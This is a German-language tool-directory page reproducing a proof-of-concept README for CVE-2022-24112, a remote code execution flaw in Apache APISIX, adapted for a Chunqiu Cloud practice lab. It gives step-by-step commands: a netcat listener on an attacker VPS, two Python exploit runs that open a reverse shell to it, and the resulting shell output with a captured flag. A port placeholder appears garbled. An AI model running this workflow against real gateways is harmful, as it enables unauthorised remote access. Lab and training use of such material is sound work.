Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
Tools/GitHubGitHub/acczdy/cve-2022-24112_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingAPI-Sicherheit
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

Repository anzeigen
51vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

POC

Gesammelte POCs

CVE-2022-24112

Um die Übungsumgebung Chunqiu Cloud für CVE-2022-24112 zu erstellen, habe ich zwei POCs modifiziert. Die POCs von M4xSec und twseptian wurden leicht angepasst, um sie an die Übungsumgebung Chunqiu Cloud anzupassen:


Chunqiu Cloud-Übungsumgebung: CVE-2022-24112:

Apache APISIX ist ein cloudnativer Microservices-API-Gateway-Dienst der Apache Software Foundation. Die Software basiert auf OpenResty und etcd und bietet dynamisches Routing sowie Hot-Reloading von Plugins, was sie für die API-Verwaltung in Microservices-Architekturen geeignet macht. In Apache APISIX gibt es eine Sicherheitslücke zur Remote-Codeausführung, die darauf zurückzuführen ist, dass das batch-requests-Plugin die Batch-Anfragen der Benutzer nicht ausreichend einschränkt. Angreifer können durch diese Schwachstelle die IP-Beschränkung der Admin-API umgehen, was zu einer Remote-Codeausführung führen kann.


Originale POCs:

  1. M4xSec: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py
  2. twseptian: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

Die modifizierten POCs sind die beiden oben von mir genannten, jeweils für die Verwendung unter Linux und Windows:


CVE-2022-24112_Linux_by_twseptian.py

  1. VPS-Listener starten: nc -lvvp 18888

  2. In das POC-Verzeichnis wechseln und ausführen:

    Hinweis: Beim Hinzufügen der -t-Daten muss kein http:// oder https:// angegeben werden, nur Domain + Port, wie folgt:

    root@kitploit:~
    python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
    
  3. Zurück zum VPS und folgende Ausgabe prüfen:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

CVE-2022-24112_Windows_by_M4xSec.py

  1. VPS-Listener starten: nc -lvvp 18888

  2. In das POC-Verzeichnis wechseln und ausführen:

    Hinweis: Beim Hinzufügen der -t-Daten muss kein http:// oder https:// angegeben werden, nur Domain + Port, wie folgt:

    root@kitploit:~
    python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
    
  3. Zurück zum VPS und folgende Ausgabe prüfen:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    
Tool herunterladen